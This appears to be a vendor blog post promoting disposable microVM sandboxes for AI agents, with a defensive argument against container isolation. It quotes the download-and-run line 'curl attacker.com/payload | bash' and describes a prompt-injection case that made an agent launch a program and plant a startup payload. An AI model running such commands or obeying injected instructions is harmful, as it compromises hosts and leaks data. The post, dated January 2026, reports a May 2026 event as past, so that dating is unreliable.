
January 27, 2026
The most capable AI agents need more than API access. They need to write code and run it. Browse the web. Install packages. Read and write files. Use command-line tools. In short, they need a computer.
The problem is obvious: giving an AI agent a computer means giving it the ability to execute arbitrary code. And that code comes from natural language prompts — the most injection-prone input surface in computing. One prompt injection away from curl attacker.com/payload | bash.
This is not a tail risk anymore. In its Top 10 for Agentic Applications (December 2025), OWASP put goal hijack and tool misuse at the top of the list precisely because hidden prompts have already turned production copilots into exfiltration engines. The answer is not to make the model perfectly obedient — it is to make the environment it runs in disposable. The diagram below shows the shape of the defense: the agent gets a real computer, but it is a sealed one.
Prompt injection leads to code generation, code generation leads to code execution, and unsandboxed code execution leads to data exfiltration, lateral movement, or persistent backdoors. The entire chain from “user message” to “compromised server” can happen in a single agent turn.
It's not hypothetical. In May 2026, Microsoft's own security team showed that a single injected prompt was enough to launch calc.exe on the host running an agent built on Semantic Kernel — and a related flaw let the agent write a payload straight into the Windows Startup folder. Their conclusion is the one that matters here: your LLM is not a security boundary, and any tool parameter the model can influence must be treated as attacker-controlled input. The agent faithfully executes injected instructions because it can't distinguish them from legitimate requests.
Most agent sandboxing solutions use containers. Containers share the host kernel. A kernel exploit from inside the container reaches the host and every other container on it. For untrusted code execution, this is the wrong isolation boundary.
Docker containers were designed for packaging and deployment, not for running hostile code. The isolation is process-level: namespaces and cgroups. These are software abstractions over a shared kernel. When the shared kernel has a vulnerability — and it regularly does — the isolation disappears.
Seccomp profiles and AppArmor help, but they're allowlists over a complex syscall interface. One missed syscall, one edge case in a filter, and the escape is possible. For AI agents executing arbitrary, unpredictable code, you want the isolation boundary to be hardware, not policy.
VMs run their own kernel. The isolation is enforced by the CPU's virtualization extensions (Intel VT-x, AMD-V), not by software policy. A compromised VM cannot access the host kernel, other VMs, or the host network. There is no shared kernel to exploit.
This is the same isolation model used by every major cloud provider to separate tenants. AWS, GCP, and Azure all use hardware virtualization as the trust boundary between customers. If it's good enough to separate competing enterprises on the same physical hardware, it's good enough for your AI agents.
The old objection — “VMs are too heavy to spin up per task” — no longer holds. Lightweight VM monitors like Firecracker boot a fresh guest in roughly 125 milliseconds with under 5 MiB of memory overhead per VM, which is why per-agent microVMs have become the default isolation model for hosted code-execution sandboxes. You get the security of a separate kernel at close to container-launch latency.
Build purpose-built VM images containing only what the agent needs. Deploy one per agent session. Destroy it when done. Every session starts from a clean, reproducible, minimal image with hardware-level isolation.
OpenFactory lets you define exactly what goes into the agent's VM:
The best security property of an agent VM is that it doesn't persist. Deploy from a clean image, run the task, destroy the VM. No state accumulates. No backdoors survive. Every session is a fresh start from a known-good baseline.
Traditional infrastructure fights to keep servers running. Agent infrastructure should fight to tear them down. The shorter the VM lives, the smaller the window for an attacker. The less state it accumulates, the less there is to exfiltrate.
Describe your agent's requirements to OpenFactory — language runtimes, tools, security level — and get a deployable VM image in minutes. No Dockerfile, no Packer templates, no manual configuration.
Stop running AI agents on your production servers. Stop trusting containers to isolate untrusted code. Give your agents their own computers — isolated, disposable, and purpose-built.
OpenFactory's free flow is for browsing. Persistent VMs, SSH access, snapshots, your own ISO, and fleet deployment live on a paid plan.